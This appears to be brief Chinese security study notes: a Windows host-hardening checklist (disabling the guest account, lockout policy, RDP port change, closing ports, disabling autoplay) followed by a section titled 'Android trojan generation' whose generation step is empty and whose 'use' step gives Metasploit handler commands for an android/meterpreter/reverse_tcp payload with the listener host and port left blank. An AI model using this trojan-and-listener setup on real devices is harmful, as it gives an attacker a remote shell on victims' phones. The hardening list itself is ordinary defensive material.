Windows主机安全加固
- 禁用guest账户
- 设置账户锁定策略
- 设置Administrator不允许终端登陆
- 使用注册表更改远程桌面监听的端口
- 用netstat -an 查看端口打开情况,关闭不必要的端口
- 关闭自动播放,防止U盘插入后病毒自动运行
Android木马生成
生成:
利用:
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost ...
set lport ...
run